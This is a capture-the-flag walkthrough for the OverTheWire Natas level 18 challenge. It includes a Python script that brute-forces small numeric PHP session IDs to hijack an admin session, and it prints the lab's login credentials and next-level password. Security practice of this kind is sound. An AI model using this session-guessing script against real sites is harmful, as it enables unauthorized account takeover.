AlfaLogic

Veni, Vidi, Vici!

NatasOverTheWire

Natas19

alfamyk

Website URL: http://overthewire.org/wargames/natas/natas19.html

According to the data on the OverTheWire webpage.

Username: natas19
URL:      http://natas19.natas.labs.overthewire.org

Let’s log into the URL for Natas18

Fig. 1

Look at the source code.

Fig. 2
Fig. 3

Upon analyzing the source code, it seems that the credentials will be printed if my_session_start() is successfully executed. Now, this function is successfully executed only when:

  • The cookie has the PHPSESSID variable set in the cookie to a valid (numeric) value.
  • Session could be started based on the PHPSESSID.
  • The _SESSION variable has the admin value set to non-zero value.

Now, consider the else part of the same condition, which will be executed by default (since, initially there wouldn’t be any PHPSESSID set in the cookie). It tries to create a PHP session based on the username provided and starts the session. Note that by default, the logic isn’t considering the password and also is not setting the admin parameter to 1.

Let’s try logging with dummy credentials for admin user and intercept the post request.

Fig. 4

Let’s have a look at the intercepted request.

Fig. 5

The request is being passed on with PHPSESSID as 169, username as admin. Let’s now switch to cookie based logic. First, we set the PHPSESSID to 169 in the cookie.

Fig. 6

Then to check whether we are on the right branch of code, let’s get into debug mode. That can be done by adding ?debug in front of the URL.

Fig. 7

Looks like we got into the right branch. Now, all that is left is to set $_SESSION[“admin”] = 1. However, the $_SESSION variable is a server side variable. We cannot access it directly. It is set as a part of the session. The kind of session, is thus decided by the PHPSESSID in the cookie.

In order to get an admin session, we need to manually set the PHPSESSID to the exact value of the admin session. Although, we don’t yet know the session ID for admin, we can see that there are a maximum of 640 values. Let’s whip up a script to try all of them to get us the admin PHPSESSID.

import requests
from requests.auth import HTTPBasicAuth
from time import sleep

def main():
    Auth = HTTPBasicAuth('natas18','xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
    Data = {'username':'admin', 'password':'admin','admin':'1'}
    
    for i in range(0,640): 
        cookie = {'PHPSESSID':str(i)}
        r = requests.get("http://natas18.natas.labs.overthewire.org/index.php?debug",params=Data,auth=Auth,cookies=cookie)
        if ("logged in as a regular user" not in r.text):
            print("Admin: ", i)    
            break   
    
    return
    
if __name__=='__main__':
    main()

Let’s run it. It’ll take about 2-3 minutes.

Fig. 8

So, we got the admin session ID as 119. Let’s set it in the cookie and view the response.

Fig. 9

Done!

Password for next level: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

You May Also Like

Bandit4

alfamyk

Level4

alfamyk

Krypton4

alfamyk

Leave a Reply

Your email address will not be published. Required fields are marked *